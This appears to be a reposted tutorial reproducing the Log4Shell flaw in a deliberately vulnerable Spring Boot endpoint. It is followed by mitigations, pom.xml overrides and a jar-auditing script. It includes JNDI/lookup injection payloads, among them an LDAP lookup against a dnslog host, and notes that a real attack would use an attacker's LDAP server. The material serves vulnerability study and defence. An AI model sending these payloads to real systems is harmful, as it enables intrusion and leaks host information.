Reproducing the log4j2 vulnerability in Spring Boot

Project setup and environment

pom.xml

<parent>
   <groupId>org.springframework.boot</groupId>
   <artifactId>spring-boot-starter-parent</artifactId>
   <version>2.6.1</version>
</parent>

<dependencies>
   <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <!-- drop the default Logback starter so that log4j2 becomes the logging backend -->
      <exclusions>
         <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
         </exclusion>
      </exclusions>
   </dependency>

   <!-- an old starter, pinned on purpose so that a vulnerable (pre-2.15) log4j-core ends up
        on the classpath. The effective log4j-core version is whatever the parent's dependency
        management resolves it to, so confirm it with:
        mvn dependency:tree -Dincludes=org.apache.logging.log4j -->
   <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-log4j2</artifactId>
      <version>2.1.1.RELEASE</version>
   </dependency>
</dependencies>

Java environment: JDK 1.8

java version "11.0.13" 2021-10-19 LTS
Java(TM) SE Runtime Environment 18.9 (build 11.0.13+10-LTS-370)
Java HotSpot(TM) 64-Bit Server VM 18.9 (build 11.0.13+10-LTS-370, mixed mode)

(The java -version output pasted above is from JDK 11.0.13, but the lookup results further down report build 1.8.0_162, so the requests were evidently run against JDK 8. The JDK version matters for what an attacker can do next: from 8u191 onward com.sun.jndi.ldap.object.trustURLCodebase defaults to false, so a JNDI LDAP reference can no longer load a class from a remote codebase. The DNS callback used in the dnslog test below fires on any JDK, and exploitation on newer JDKs remains possible through other paths, so the JDK is not a fix.)

Writing the web endpoint

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class TestController {

    private static final Logger logger = LogManager.getLogger(TestController.class);

    /**
     * Request bodies to try against POST /test:
     *
     * ${java:vm}   logs: Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)
     *
     * http://www.dnslog.cn/
     * ${jndi:ldap://7yqrz4.dnslog.cn}   triggers a DNS lookup of the dnslog subdomain
     *
     * @param str the raw request body, logged without any sanitisation (this is the bug under test)
     * @return the body echoed back
     */
    @PostMapping("/test")
    public String test(@RequestBody String str) {
        // The body becomes a message parameter; log4j <= 2.14.1 then runs ${...} lookups
        // over the formatted message, so attacker-controlled text reaches the JNDI lookup.
        logger.info("str={}", str);
        return "return=" + str;
    }
}

Testing the vulnerability

Send a POST to /test with the body ${java:vm}: the log line comes out with the value substituted in, not the literal text.

Why does ${java:vm} get expanded? Step through it in the debugger; the path is org.apache.logging.log4j.core.lookup.JavaLookup#lookup, reached through the StrSubstitutor/Interpolator that the %m pattern converter applies to the formatted message.

JavaLookup supports quite a few keys; trying them one by one:

${java:vm}
Java HotSpot(TM) 64-Bit Server VM (build 25.162-b12, mixed mode)

${java:locale}
default locale: zh_CN, platform encoding: UTF-8

${java:hw}
processors: 4, architecture: x86_64-64

${java:os}
Mac OS X 10.14.6 unknown, architecture: x86_64-64

${java:version}
Java version 1.8.0_162

${java:runtime}
Java(TM) SE Runtime Environment (build 1.8.0_162-b12) from Oracle Corporation

DNSLog (www.dnslog.cn/)

Get a subdomain from dnslog.cn, send ${jndi:ldap://7yqrz4.dnslog.cn} (with your own subdomain) as the request body, and refresh the DNSLog page. The JNDI lookup resolves the host name before it connects, so the DNS query shows up there even though no LDAP server is answering. That confirms the JNDI lookup runs on attacker-controlled input; a real attack would point it at an LDAP server the attacker controls instead of a DNS logger.

Mitigations. Affected versions: Apache Log4j 2.x from 2.0-beta9 through 2.14.1 (CVE-2021-44228); 2.15.0 is still affected by the follow-up CVE-2021-45046.

  1. JVM flag: -Dlog4j2.formatMsgNoLookups=true (only honoured by 2.10 to 2.14.1, and no longer considered sufficient after CVE-2021-45046; treat it as a stopgap).
  2. Configuration: log4j2.formatMsgNoLookups=true in a log4j2.component.properties file on the classpath (same caveat).
  3. Environment variable: LOG4J_FORMAT_MSG_NO_LOOKUPS=true (same caveat).
  4. Upgrade to >= 2.16.0, which removes message lookups entirely; 2.17.1 additionally covers the later CVE-2021-45105 and CVE-2021-44832 fixes: mvnrepository.com/artifact/or…
  5. If log4j comes in through spring-boot-starter-log4j2, override the transitive version in
pom.xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <version>2.1.1.RELEASE</version>

    <!-- first exclude the transitive log4j artifacts -->
    <exclusions>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
        </exclusion>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
        </exclusion>
    </exclusions>
</dependency>

<!-- then add them back explicitly at a fixed version -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.16.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.16.0</version>
</dependency>

Because the project inherits from spring-boot-starter-parent, the shorter route is to set <log4j2.version>2.17.1</log4j2.version> under <properties>, which moves every log4j artifact the starter manages (log4j-api, log4j-core, log4j-slf4j-impl, log4j-jul) in one place instead of only the two excluded above. Either way, verify the result with mvn dependency:tree -Dincludes=org.apache.logging.log4j and make sure no other dependency path still drags in an old log4j-core.
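Whichever pom.xml route is used, what matters is the log4j-core jar that actually lands in the build output or on the server. The following script is added here as an example; it is neither the page's code nor a Log4j project tool. It audits every jar under a directory, including the nested BOOT-INF/lib/*.jar of a Spring Boot fat jar, by reading each log4j-core's Maven pom.properties and checking whether JndiLookup.class is still present, then classifies the jar against CVE-2021-44228 and CVE-2021-45046. The sample jars it builds in memory are constructed stand-ins that carry only that metadata, so it runs offline; pass a directory such as target/ as the first argument to audit real jars.

```python
"""Audit jars for the log4j-core they really ship.

Added example (not from the page or the Log4j project). Walks a directory of
jars, including Spring Boot fat jars that nest BOOT-INF/lib/*.jar, reads each
log4j-core's Maven pom.properties, checks whether
org/apache/logging/log4j/core/lookup/JndiLookup.class is still present, and
classifies it against CVE-2021-44228 / CVE-2021-45046. The sample jars are
constructed in memory so that the script runs offline.
"""
import io
import os
import re
import sys
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); unparsable -> None."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-[\w.]+)?$", text or "")
    return None if m is None else tuple(int(x or 0) for x in m.groups())

def classify(version, has_jndi_lookup):
    """'fixed' (lookups removed upstream), 'mitigated' (JndiLookup.class deleted
    from the jar), 'vulnerable' or 'unknown'. Only the two JNDI message-lookup
    CVEs are assessed; 2.17.1 also fixes CVE-2021-45105 and CVE-2021-44832."""
    v = parse_version(version)
    if v is None or v[0] != 2:
        return "unknown"
    fixed = (v >= (2, 16, 0)
             or (v[:2] == (2, 12) and v >= (2, 12, 2))   # Java 7 branch
             or (v[:2] == (2, 3) and v >= (2, 3, 1)))    # Java 6 branch
    if fixed:
        return "fixed"
    return "vulnerable" if has_jndi_lookup else "mitigated"

def audit_jar(name, source, findings, depth=0):
    """Append (name, version, has_jndi_lookup, verdict) for one jar and, one
    level down, for every nested *.jar inside it. source is a path or file object."""
    with zipfile.ZipFile(source) as zf:
        names = set(zf.namelist())
        has_jndi = JNDI_CLASS in names
        version = None
        if POM_PROPS in names:
            m = re.search(r"^version=(.+)$", zf.read(POM_PROPS).decode("utf-8", "replace"), re.M)
            version = m.group(1).strip() if m else None
        if version or has_jndi:   # shaded builds may lack pom.properties but keep the class
            findings.append((name, version, has_jndi, classify(version, has_jndi)))
        if depth < 1:
            for entry in sorted(names):
                if entry.endswith(".jar"):
                    audit_jar(f"{name}!/{entry}", io.BytesIO(zf.read(entry)), findings, depth + 1)
    return findings

def audit_tree(root):
    """Audit every *.jar below root (e.g. target/, BOOT-INF/lib, /opt/app)."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for f in sorted(files):
            if f.endswith(".jar"):
                audit_jar(os.path.join(dirpath, f), os.path.join(dirpath, f), findings)
    return findings

def build_sample_jar(version, keep_jndi_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar: metadata only, no real classes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if keep_jndi_lookup:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes only
    return buf.getvalue()

def build_sample_fat_jar(nested):
    """Constructed Spring Boot style fat jar: {jar name: bytes} stored under BOOT-INF/lib/."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for fname, data in nested.items():
            zf.writestr("BOOT-INF/lib/" + fname, data)
    return buf.getvalue()

def demo():
    """Audit four constructed jars; returns {jar name: verdict}."""
    samples = {
        "log4j-core-2.11.1.jar": build_sample_jar("2.11.1"),
        "log4j-core-2.14.1-stripped.jar": build_sample_jar("2.14.1", keep_jndi_lookup=False),
        "log4j-core-2.16.0.jar": build_sample_jar("2.16.0"),
        "app.jar": build_sample_fat_jar({"log4j-core-2.15.0.jar": build_sample_jar("2.15.0")}),
    }
    findings = []
    for name, data in samples.items():
        audit_jar(name, io.BytesIO(data), findings)
    return {name: verdict for name, _v, _j, verdict in findings}

if __name__ == "__main__":
    rows = audit_tree(sys.argv[1]) if len(sys.argv) > 1 else None
    for name, verdict in (demo().items() if rows is None else [(r[0], r[3]) for r in rows]):
        print(f"{verdict:11} {name}")
```

The "mitigated" verdict corresponds to the workaround Apache documented for deployments that could not upgrade, zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class: it removes the JNDI lookup but leaves message lookups in place, so it is a fallback rather than a substitute for 2.17.1. Note that 2.15.0 is reported as vulnerable on purpose, since CVE-2021-45046 still applies to it.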

References

apache log4j lookups

Apache Log4j CVE

Reposted from juejin.im/post/7041843601118068773